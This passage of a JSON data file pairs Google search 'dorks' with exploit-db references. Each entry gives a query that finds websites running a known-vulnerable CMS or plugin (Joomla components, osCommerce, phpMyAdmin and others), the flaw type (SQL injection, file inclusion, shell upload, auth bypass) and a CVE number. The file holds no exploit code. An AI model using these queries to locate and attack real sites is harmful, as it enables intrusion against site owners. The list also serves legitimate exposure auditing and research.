Vulnerabilities - CVE: 2008-2902: https://www.exploit-db.com/exploits/5821"}, {"dork": "allinurl:\"com_neogallery\"", "description": "Joomla Component NeoGallery 1.1 SQL Injection Vulnerability - CVE: 2008-0752: https://www.exploit-db.com/exploits/5083"}, {"dork": "inurl:\"com_category\"", "description": "Joomla Component com_category (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9126"}, {"dork": "\"Powered By Zoopeer\"", "description": "Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability: https://www.exploit-db.com/exploits/15354"}, {"dork": "inurl:index.php?ortupg=", "description": "CMS Ortus 1.13 Remote SQL Injection Vulnerability - CVE: 2008-6282: https://www.exploit-db.com/exploits/7237"}, {"dork": "inurl:com_jomtube", "description": "Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection: https://www.exploit-db.com/exploits/14434"}, {"dork": "\"Powered by web directory script\"", "description": "Web Directory Script 1.5.3 (site) SQL Injection Vulnerability - CVE: 2008-4091: https://www.exploit-db.com/exploits/6335"}, {"dork": "inurl:com_gigcal", "description": "Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln - CVE: 2009-0726: https://www.exploit-db.com/exploits/7746"}, {"dork": "Powered MarketSaz", "description": "MarketSaz remote file Upload Vulnerability: https://www.exploit-db.com/exploits/13927"}, {"dork": "inurl:com_ezautos", "description": "Joomla Component (com_ezautos) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15085"}, {"dork": "\"Designed & Developed by Zeeways.com\"", "description": "zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6915: https://www.exploit-db.com/exploits/7058"}, {"dork": "inurl:option=com_education_classes", "description": "joomla component education SQL injection Vulnerability: https://www.exploit-db.com/exploits/12153"}, {"dork": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "description": "e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability - CVE: 2008-4906: https://www.exploit-db.com/exploits/6885"}, {"dork": "infusions/recept/recept.php?", "description": "PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability - CVE: 2008-4527: https://www.exploit-db.com/exploits/6683"}, {"dork": "\"Powered By diskos\"", "description": "Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities - CVE: 2009-4798: https://www.exploit-db.com/exploits/8307"}, {"dork": "Copyright 2006 \u00c2\u00a9 Flax Article Manager v1.1", "description": "Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability - CVE: 2009-0284: https://www.exploit-db.com/exploits/7862"}, {"dork": "Powered by PHP Image Gallery", "description": "SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln - CVE: 2008-6488: https://www.exploit-db.com/exploits/7021"}, {"dork": "Powered By Pligg | Legal: License and Source", "description": "Pligg CMS 9.9.0 (story.php id) Remote SQL Injection Vulnerability - CVE: 2008-3366: https://www.exploit-db.com/exploits/6146"}, {"dork": "inurl:/_blogadata/", "description": "Blogator-script 0.95 Change User Password Vulnerability - CVE: 2008-6473: https://www.exploit-db.com/exploits/5370"}, {"dork": "inurl:\"com_a6mambocredits\"", "description": "Mambo a6mambocredits Component 1.0.0 File Include Vulnerability - CVE: 2006-4288: https://www.exploit-db.com/exploits/2207"}, {"dork": "\"index.php?id_menu=\" CMScontrol", "description": "CMScontrol (Content Management Portal Solutions) Sql Injection - CVE: 2009-3326: https://www.exploit-db.com/exploits/9727"}, {"dork": "inurl:\"com_eventcal\"", "description": "Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14187"}, {"dork": "\"and Powered By :Sansak\"", "description": "WebBoard 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability: https://www.exploit-db.com/exploits/6303"}, {"dork": "inurl:profile.php?mode=", "description": "PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability): https://www.exploit-db.com/exploits/14440"}, {"dork": "Powered By SalSa Creations", "description": "ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability - CVE: 2008-5489: https://www.exploit-db.com/exploits/7128"}, {"dork": "inurl:modules.php?op= \"pollID\"", "description": "MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability - CVE: 2009-2618: https://www.exploit-db.com/exploits/9021"}, {"dork": "\"Powered by SazCart\"", "description": "SazCart 1.5.1 (prodid) Remote SQL Injection - CVE: 2008-2411: https://www.exploit-db.com/exploits/5576"}, {"dork": "intext:\"Powered by Max.Blog\"", "description": "Max.Blog 1.0.6 (offline_auth.php) Offline Authentication Bypass - CVE: 2009-0409: https://www.exploit-db.com/exploits/7899"}, {"dork": "\"Powered by CMSimple\"", "description": "CMSimple 3.1 Local File Inclusion / Arbitrary File Upload - CVE: 2008-2650: https://www.exploit-db.com/exploits/5700"}, {"dork": "inurl:\"com_performs\"", "description": "perForms Mambo Component 1.0 Remote File Inclusion - CVE: 2006-3774: https://www.exploit-db.com/exploits/2025"}, {"dork": "inurl:\"com_mambowiki\"", "description": "Mambo MamboWiki Component 0.9.6 Remote Include Vulnerability - CVE: 2006-4282: https://www.exploit-db.com/exploits/2213"}, {"dork": "index.asp?archivio=OK", "description": "Ublog access version Arbitrary Database Disclosure: https://www.exploit-db.com/exploits/8610"}, {"dork": "album.asp?pic= .jpg cat=", "description": "aspWebAlbum 3.2 Multiple Remote Vulnerabilities - CVE: 2008-6977: https://www.exploit-db.com/exploits/6420"}, {"dork": "\"Multi-Page Comment System\"", "description": "Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability - CVE: 2008-2293: https://www.exploit-db.com/exploits/5630"}, {"dork": "inurl:\"com_wmtpic\"", "description": "Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14128"}, {"dork": "inurl:index.php?mode=game_player", "description": "Tycoon CMS Record Script SQL Injection Vulnerability - CVE: 2010-3027: https://www.exploit-db.com/exploits/14572"}, {"dork": "album.asp?pic= .jpg cat=", "description": "aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6977: https://www.exploit-db.com/exploits/6357"}, {"dork": "inurl:\"option=com_simpleshop\" & inurl:\"viewprod\"", "description": "Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14501"}, {"dork": "intext:\"Powered by Community CMS\"", "description": "Community CMS 0.5 Multiple SQL Injection Vulnerabilities - CVE: 2009-4794: https://www.exploit-db.com/exploits/8323"}, {"dork": "\"Powered by Scallywag\"", "description": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities - CVE: 2007-2900: https://www.exploit-db.com/exploits/3972"}, {"dork": "inurl:\"phshoutbox.php\"", "description": "PhShoutBox 1.5 (final) Insecure Cookie Handling Vulnerability - CVE: 2008-1971: https://www.exploit-db.com/exploits/5467"}, {"dork": "\"index.php?option=com_seyret\" / \"com_seyret\"", "description": "Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/14183"}, {"dork": "inurl:inc_memberdirectorymanager.asp", "description": "DMXReady Member Directory Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0427: https://www.exploit-db.com/exploits/7773"}, {"dork": "inurl:\"mod=notizie\"", "description": "XCMS 1.83 Remote Command Execution - CVE: 2007-6652: https://www.exploit-db.com/exploits/4813"}, {"dork": "\"Powered By ScozNews\"", "description": "ScozNews 1.2.1 (mainpath) Remote File Inclusion Vulnerability - CVE: 2006-2487: https://www.exploit-db.com/exploits/1800"}, {"dork": "\"PHP BP Team\"", "description": "phpBP RC3 (2.204) FIX4 Remote SQL Injection Vulnerability - CVE: 2008-1408: https://www.exploit-db.com/exploits/5263"}, {"dork": "inurl:\"zcat.php?id=\"", "description": "IRAN N.E.T E-commerce Group SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10350"}, {"dork": "inurl:K-Search, Powered By K-Search", "description": "K-Search (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2010-2457: https://www.exploit-db.com/exploits/13993"}, {"dork": "inurl:\"com_mscomment\"", "description": "Joomla Component MS Comment LFI Vulnerability - CVE: 2010-2050: https://www.exploit-db.com/exploits/12611"}, {"dork": "Powered by Mitra Informatika Solusindo", "description": "Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5214"}, {"dork": "2009 \u00a9 Satellite-X", "description": "Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11962"}, {"dork": "\"Powered by bSpeak 1.10\"", "description": "bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability - CVE: 2009-1747: https://www.exploit-db.com/exploits/8751"}, {"dork": "Powered by osCommerce", "description": "osCommerce Online Merchant 2.2 RC2a Code Execution: https://www.exploit-db.com/exploits/9556"}, {"dork": "inurl:choosecard.php?catid=", "description": "post Card ( catid ) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11892"}, {"dork": "inurl:\"com_jphoto\"", "description": "Joomla Component com_jphoto SQL Injection Vulnerability - (id) - CVE: 2009-4598: https://www.exploit-db.com/exploits/10367"}, {"dork": "allinurl: e107_plugins/easyshop/easyshop.php", "description": "e107 Plugin EasyShop (category_id) Blind SQL Injection - CVE: 2008-4786: https://www.exploit-db.com/exploits/6852"}, {"dork": "inurl:\"com_koesubmit\"", "description": "Mambo com_koesubmit 1.0.0 Remote File Inclusion - CVE: 2009-3333: https://www.exploit-db.com/exploits/9714"}, {"dork": "inurl:add_soft.php", "description": "Hotscripts Clone (cid) Remote SQL Injection Vulnerability - CVE: 2008-6405: https://www.exploit-db.com/exploits/6545"}, {"dork": "\"Powered by Absolute Podcast\"", "description": "Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability - CVE: 2008-6857: https://www.exploit-db.com/exploits/6882"}, {"dork": "\"Copyright-2008@zeejobsite.com\"", "description": "ZEEJOBSITE 2.0 Remote File Upload Vulnerability - CVE: 2008-6913: https://www.exploit-db.com/exploits/7062"}, {"dork": "inurl:\"index.php?option=com_jp_jobs\"", "description": "Joomla component jp_jobs SQL Injection Vulnerability - CVE: 2010-1350: https://www.exploit-db.com/exploits/12037"}, {"dork": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+Category.php%3FIndustrYID%3D", "description": "CmS (id) SQL Injection Vulnerability - CVE: 2009-2439: https://www.exploit-db.com/exploits/12333"}, {"dork": "index2.php?option=com_joomlaboard", "description": "Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability: https://www.exploit-db.com/exploits/3560"}, {"dork": "inurl:\"cameralife/index.php\"", "description": "Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: https://www.exploit-db.com/exploits/6710"}, {"dork": "inurl:option=com_huruhelpdesk", "description": "joomla component allvideos BLIND SQL injection Vulnerability: https://www.exploit-db.com/exploits/12137"}, {"dork": "inurl:inc_membersareamanager.asp", "description": "DMXReady Members Area Manager 1.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7774"}, {"dork": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "description": "Moa Gallery 1.2.0 Multiple Remote File Inclusion Vulnerabilities - CVE: 2009-4614: https://www.exploit-db.com/exploits/9522"}, {"dork": "inurl:/component/jesectionfinder/", "description": "Joomla Component JE Section Finder LFI Vulnerability - CVE: 2010-2680: https://www.exploit-db.com/exploits/14064"}, {"dork": "intitle:phpMyAdmin", "description": "phpMyAdmin Code Injection RCE - CVE: 2009-1151: https://www.exploit-db.com/exploits/8992"}, {"dork": "inurl:\"com_phocagallery\"", "description": "Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14207"}, {"dork": "inurl:\"member.php?page=comments\"", "description": "6ALBlog (newsid) Remote SQL Injection Vulnerability - CVE: 2007-3451: https://www.exploit-db.com/exploits/4104"}, {"dork": "''webboard question.asp QID''", "description": "PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability - CVE: 2008-1039: https://www.exploit-db.com/exploits/5185"}, {"dork": "inurl:\"index.php?option=com_ponygallery\"", "description": "Joomla Component Pony Gallery 1.5 SQL Injection Vulnerability - CVE: 2007-4046: https://www.exploit-db.com/exploits/4201"}, {"dork": "\"PowerMovieList 0.14 Beta Copyright\"", "description": "PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8062"}, {"dork": "\"powered by MODx\"", "description": "MODx CMS 0.9.2.1 (FCKeditor) Remote File Include Vulnerability - CVE: 2006-5730: https://www.exploit-db.com/exploits/2706/"}, {"dork": "\"Powered by words tag script\"", "description": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability - CVE: 2008-3945: https://www.exploit-db.com/exploits/6336"}, {"dork": "FrontAccounting", "description": "FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability - CVE: 2007-4279: https://www.exploit-db.com/exploits/4269"}, {"dork": "Powered by Egorix", "description": "EPOLL SYSTEM 3.1 (password.dat) Disclosure: https://www.exploit-db.com/exploits/7864"}, {"dork": "inurl:\"kgb19\"", "description": "KGB 1.9 (sesskglogadmin.php) Local File Include - CVE: 2007-0337: https://www.exploit-db.com/exploits/3134"}, {"dork": "allinurl:buyer/index.php?ProductID=", "description": "Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12609"}, {"dork": "\"powered by Sitellite\"", "description": "Sitellite CMS 4.2.12 (559668.php) Remote File Inclusion Vulnerability - CVE: 2007-3228: https://www.exploit-db.com/exploits/4071"}, {"dork": "\"Powered by Comdev News Publisher\"", "description": "Comdev News Publisher Remote SQL Injection Vulnerability - CVE: 2008-1872: https://www.exploit-db.com/exploits/5362"}, {"dork": "Powered By: AJ Square Inc", "description": "AJ Article Persistent XSS Vulnerability - CVE: 2010-2917: https://www.exploit-db.com/exploits/14354"}, {"dork": "inurl:option=com_huruhelpdesk", "description": "joomla component huruhelpdesk SQL injection Vulnerability: https://www.exploit-db.com/exploits/12124"}, {"dork": "inurl:inc_securedocumentlibrary.asp", "description": "DMXReady Secure Document Library 1.1 Remote SQL Injection Vuln - CVE: 2009-0428: https://www.exploit-db.com/exploits/7787"}, {"dork": "Powered by Dolphin", "description": "Dolphin v7.0.3 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15400"}, {"dork": "inurl:\"php/showContent.php?linkid=\"", "description": "Worldviewer.com CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12163"}, {"dork": "sitou timou tumou tou", "description": "Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability - CVE: 2009-4622: https://www.exploit-db.com/exploits/9635"}, {"dork": "inurl:index.php?option=com_lowcosthotels", "description": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln - CVE: 2008-5864: https://www.exploit-db.com/exploits/7567"}, {"dork": "Vibro-School CMS by nicLOR.net", "description": "Vibro-School-CMS (nID) Remote SQL injection Vulnerability - CVE: 2008-6795: https://www.exploit-db.com/exploits/6981"}, {"dork": "\"Absolute Poll Manager XE\"", "description": "Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability - CVE: 2008-6860: https://www.exploit-db.com/exploits/6883"}, {"dork": "Copyright 2010. Software Index", "description": "PishBini Footbal XSS and SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14000"}, {"dork": "inurl:\"com_linkdirectory\"", "description": "Joomla Link Directory Component 1.0.3 Remote Include Vulnerability: https://www.exploit-db.com/exploits/2214"}, {"dork": "inurl:com_manager", "description": "Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12257"}, {"dork": "\"Developed by Infoware Solutions\"", "description": "My PHP Dating (success_story.php id) SQL Injection Vulnerability - CVE: 2008-4705: https://www.exploit-db.com/exploits/6754"}, {"dork": "allinurl:\"verliadmin\"", "description": "VerliAdmin 0.3 (index.php) Remote File Include - CVE: 2006-6666: https://www.exploit-db.com/exploits/2944"}, {"dork": "\"Powered by UNAK-CMS\"", "description": "UNAK-CMS 1.5 (dirroot) Remote File Include Vulnerabilities - CVE: 2006-4890: https://www.exploit-db.com/exploits/2380"}, {"dork": "inurl:\"com_quickfaq\"", "description": "Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability - CVE: 2010-2845: https://www.exploit-db.com/exploits/14296"}, {"dork": "\"Powered by EZCMS\"", "description": "EZCMS 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities - CVE: 2008-2921: https://www.exploit-db.com/exploits/5819"}, {"dork": "inurl:index.php?menu=adorder", "description": "ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3944: https://www.exploit-db.com/exploits/6362"}, {"dork": "allinurl:\"com_accombo\"", "description": "Mambo Component accombo 1.x (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5279"}, {"dork": "\"Powered by Scratcher\"", "description": "Scratcher (SQL/XSS) Multiple Remote Vulnerability - CVE: 2010-1742: https://www.exploit-db.com/exploits/12458"}, {"dork": "\"Powered by How2asp\"", "description": "How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability - CVE: 2008-2417: https://www.exploit-db.com/exploits/5638"}, {"dork": "\"Powered by PHPBasket\"", "description": "PHPBasket (product.php pro_id) SQL Injection Vulnerability - CVE: 2008-3713: https://www.exploit-db.com/exploits/6258"}, {"dork": "\"Powered by Dayfox Designs\"", "description": "Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability - CVE: 2007-1525: https://www.exploit-db.com/exploits/3478"}, {"dork": "\"PHPNews Version 0.93\"", "description": "PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability - CVE: 2007-4232: https://www.exploit-db.com/exploits/4268"}, {"dork": "\"/nuke/iframe.php\"", "description": "iFrame for Phpnuke (iframe.php) Remote File Inclusion Vulnerability - CVE: 2007-1626: https://www.exploit-db.com/exploits/3512"}, {"dork": "Sad Raven's Click Counter v1.0", "description": "Sad Raven's Click Counter 1.0 passwd.dat Disclosure: https://www.exploit-db.com/exploits/7844"}, {"dork": "Powered by dB Masters' Curium CMS 1", "description": "dB Masters Curium CMS 1.03 (c_id) Remote SQL Injection Vulnerability - CVE: 2007-0765: https://www.exploit-db.com/exploits/3256"}, {"dork": "Powered by XT-Commerce", "description": "XT-Commerce v1 Beta 1 by Pass / Creat and Download Backup Vulnerability: https://www.exploit-db.com/exploits/12447"}, {"dork": "\"Yogurt build\"", "description": "Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities - CVE: 2009-2033: https://www.exploit-db.com/exploits/8932"}, {"dork": "inurl:e107_plugins", "description": "e107 Code Exec - CVE: 2010-2099: https://www.exploit-db.com/exploits/12715"}, {"dork": "\"Scientific Image DataBase\"", "description": "Scientific Image DataBase 0.41 Blind SQL Injection - CVE: 2008-2834: https://www.exploit-db.com/exploits/5885"}, {"dork": "Powered by phpMyRealty", "description": "phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability - CVE: 2007-6472: https://www.exploit-db.com/exploits/4750"}, {"dork": "\"Powered by myUPB\"", "description": "myUPB v2.2.6 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/13957"}, {"dork": "inurl:\"com_simpledownload\"", "description": "Joomla Component simpledownload LFI Vulnerability - CVE: 2010-2122: https://www.exploit-db.com/exploits/12618"}, {"dork": "Powered by Flinx", "description": "flinx 1.3 (category.php id) Remote SQL Injection Vulnerabilit - CVE: 2008-0468: https://www.exploit-db.com/exploits/4985"}, {"dork": "allinurl:\"com_restaurante\"", "description": "Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability - CVE: 2008-1465: https://www.exploit-db.com/exploits/5280"}, {"dork": "Powered by MyHobbySite 1.01", "description": "MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability: https://www.exploit-db.com/exploits/14977"}, {"dork": "inurl:index.php?myPlantId=", "description": "Member ID The Fish Index PHP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12850"}, {"dork": "\"powered by real-estate-website\"", "description": "Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/5763"}, {"dork": "\"This site is powered by CMS Made Simple version 1.2.2\"", "description": "CMS Made Simple 1.2.2 (TinyMCE module) SQL Injection Vuln - CVE: 2007-6656: https://www.exploit-db.com/exploits/4810"}, {"dork": "infusions/manuals/manuals.php?manual=", "description": "PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6681"}, {"dork": "allinurl:/modernbill/", "description": "Modernbill 1.6 (config.php) Remote File Include Vulnerability - CVE: 2006-4034: https://www.exploit-db.com/exploits/2127"}, {"dork": "Powered by EasySiteNetwork", "description": "Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability - CVE: 2007-6580: https://www.exploit-db.com/exploits/4770"}, {"dork": "inurl:\"main_forum.php?cat=\"", "description": "GeN3 forum V1.3 SQL Injection Vulnerability - CVE: 2009-4263: https://www.exploit-db.com/exploits/10299"}, {"dork": "\"eCommerce Engine \u00a9 2006 xt:Commerce Shopsoftware\"", "description": "xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15455"}, {"dork": "intitle:\"Powered by Open Bulletin Board\"", "description": "Open Bulletin Board Multiple Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11336"}, {"dork": "\"My Photo v1.46.4 \u00c2\u00a9 Big Resources\"", "description": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7645"}, {"dork": "Powered by Fantastic News v2.1.4", "description": "Fantastic News 2.1.4 Multiple Remote File Include Vulnerabilities: https://www.exploit-db.com/exploits/3027"}, {"dork": "Platform Dokeos 1.8.4 \u00c2\u00a9 2007", "description": "Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability - CVE: 2007-6479: https://www.exploit-db.com/exploits/4753"}, {"dork": "\"Powered by iScripts SocialWare\"", "description": "iScripts SocialWare (id) Remote SQL Injection Vulnerbility - CVE: 2008-1772: https://www.exploit-db.com/exploits/5402"}, {"dork": "Powered By eLitius 1.0", "description": "eLitius 1.0 Arbitrary Database Backup: https://www.exploit-db.com/exploits/8498"}, {"dork": "inurl:\"com_artlinks\"", "description": "Joomla Artlinks Component 1.0b4 Remote Include Vulnerability - CVE: 2006-3949: https://www.exploit-db.com/exploits/2209"}, {"dork": "inurl:com_djclassifieds", "description": "Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability: https://www.exploit-db.com/exploits/12479"}, {"dork": "inurl:ratelink.php?lnkid=", "description": "Link Trader (ratelink.php lnkid) Remote SQL Injection Vulnerability - CVE: 2008-6102: https://www.exploit-db.com/exploits/6650"}, {"dork": "Powered by: deonixscripts.com", "description": "Web Template Management System 1.3 Remote SQL Injection - CVE: 2007-5233: https://www.exploit-db.com/exploits/4482"}, {"dork": "inurl:com_ybggal", "description": "Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13979"}, {"dork": "Powered By Power Editor", "description": "Power Editor 2.0 Remote File Disclosure / Edit Vulnerability - CVE: 2008-2116: https://www.exploit-db.com/exploits/5549"}, {"dork": "\"Powered by: eSmile\"", "description": "eSmile Script (index.php) SQL Injection Vulnerability - CVE: 2010-0764: https://www.exploit-db.com/exploits/11382"}, {"dork": "\"advanced_search_results.php?gender=\"", "description": "Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - CVE: 2008-4461: https://www.exploit-db.com/exploits/6388"}, {"dork": "allinurl:\"com_ahsshop\"do=default", "description": "Mambo Component ahsShop 1.51 (vara) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5335"}, {"dork": "inurl:com_ice \"catid\"", "description": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln - CVE: 2008-6852: https://www.exploit-db.com/exploits/7572"}, {"dork": "Powered by ExoPHPDesk v1.2 Final.", "description": "ExoPHPDesk 1.2.1 (faq.php) Remote SQL Injection Vulnerability - CVE: 2007-0676: https://www.exploit-db.com/exploits/3234"}, {"dork": "allinurl:spaw2/dialogs/", "description": "Spaw Editor v1.0 & 2.0 Remote File Upload: https://www.exploit-db.com/exploits/12672"}, {"dork": "Powered by eLitius Version 1.0", "description": "eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability - CVE: 2009-1506: https://www.exploit-db.com/exploits/8563"}, {"dork": "site:scartserver.com", "description": "SCart 2.0 (page) Remote Code Execution - CVE: 2006-7012: https://www.exploit-db.com/exploits/1876"}, {"dork": "\"realizacja eCreo.eu\"", "description": "eCreo SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12713"}, {"dork": "inurl:index.php?option=com_akobook", "description": "Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability - CVE: 2009-2638: https://www.exploit-db.com/exploits/8911"}, {"dork": "inurl:\"/CMS/page.php?p=\"", "description": "Schweizer NISADA Communication CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10543"}, {"dork": "Powered by CMScout (c)2005 CMScout Group", "description": "CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities - CVE: 2008-6725: https://www.exploit-db.com/exploits/7625"}, {"dork": "intext:\"\u00a9 Tainos Webdesign\"", "description": "Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability: https://www.exploit-db.com/exploits/12631"}, {"dork": "inurl:\"com_virtuemart\"", "description": "Joomla Component com_virtuemart SQL injection vulnerability (product_id): https://www.exploit-db.com/exploits/10407"}, {"dork": "\"Powered by RW::Download v2.0.3 lite\"", "description": "RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln - CVE: 2007-4845: https://www.exploit-db.com/exploits/4371"}, {"dork": "index.php?option=com_swmenupro", "description": "Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability - CVE: 2007-1699: https://www.exploit-db.com/exploits/3557"}, {"dork": "\"Powered By OpenCart\"", "description": "Opencart 1.4.9.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/15050"}, {"dork": "Powered by eclime.com", "description": "eclime v1.1 ByPass / Create and Download Backup Vulnerability: https://www.exploit-db.com/exploits/12279"}, {"dork": "inurl:\"article.download.php\"", "description": "Star Articles 6.0 Remote Blind SQL Injection Vulnerability - CVE: 2008-7075: https://www.exploit-db.com/exploits/7240"}, {"dork": "inurl:\"com_mojo\"", "description": "Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities - CVE: 2009-4789: https://www.exploit-db.com/exploits/10273"}, {"dork": "inurl:\"article.download.php\"", "description": "Star Articles 6.0 Remote Blind SQL Injection - CVE: 2008-7075: https://www.exploit-db.com/exploits/7243"}, {"dork": "\"Powered by LightBlog\" - Powered by LightBlog", "description": "LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability - CVE: 2008-0632: https://www.exploit-db.com/exploits/5033"}, {"dork": "\"Powered by photokorn\"", "description": "photokron 1.7 (update script) Remote Database Disclosure - CVE: 2008-0297: https://www.exploit-db.com/exploits/4897/"}, {"dork": "\"Powered by MetInfo 3.0\"", "description": "MetInfo 3.0 PHP Code Injection Vulnerability: https://www.exploit-db.com/exploits/15361"}, {"dork": "pages.php?id= \"Multi Vendor Mall\"", "description": "Multi Vendor Mall (pages.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12748"}, {"dork": "Powered by Zylone IT", "description": "Zylone IT Multiple Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14270"}, {"dork": "Powered by MetInfo 3.0", "description": "Metinfo v3.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15496"}, {"dork": "Powered by Info Fisier.", "description": "Info Fisier 1.0 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10671"}, {"dork": "\"Powered by WebText\"", "description": "WebText 0.4.5.2 Remote Code Execution - CVE: 2006-6856: https://www.exploit-db.com/exploits/3036"}, {"dork": "Webdevelopment Tinx-IT", "description": "WebVision 2.1 (news.php n) Remote SQL Injection: https://www.exploit-db.com/exploits/9193"}, {"dork": "\"PHPGlossar Version 0.8\"", "description": "PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities - CVE: 2007-2751: https://www.exploit-db.com/exploits/3941"}, {"dork": "com_ijoomla_rss", "description": "Joomla Component com_ijoomla_rss Blind SQL Injection - CVE: 2009-2099: https://www.exploit-db.com/exploits/8959"}, {"dork": "inurl:\"?pilih=forum\"", "description": "AuraCMS [Forum Module] Remote SQL Injection Vulnerability - CVE: 2007-4171: https://www.exploit-db.com/exploits/4254"}, {"dork": "Powered by Guruscript.com", "description": "Freelancer Marketplace Script Upload Vulnerability: https://www.exploit-db.com/exploits/14390"}, {"dork": "allinurl:\"index.php?mod=archives\"", "description": "KwsPHP Module Archives (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5351"}, {"dork": "\"index.php?option=com_qcontacts\"", "description": "Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14350"}, {"dork": "\u00a9 Powered by sijio - Community Software", "description": "Sijio Community Software SQL Injection/Persistent XSS Vulnerability - CVE: 2010-2696: https://www.exploit-db.com/exploits/14260"}, {"dork": "Powered by TextAds 2.08", "description": "idevspot Text ads 2.08 sqli vulnerability - CVE: 2010-2319: https://www.exploit-db.com/exploits/13749"}, {"dork": "inurl:/com_chronocontact", "description": "Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities - CVE: 2008-0567: https://www.exploit-db.com/exploits/5020"}, {"dork": 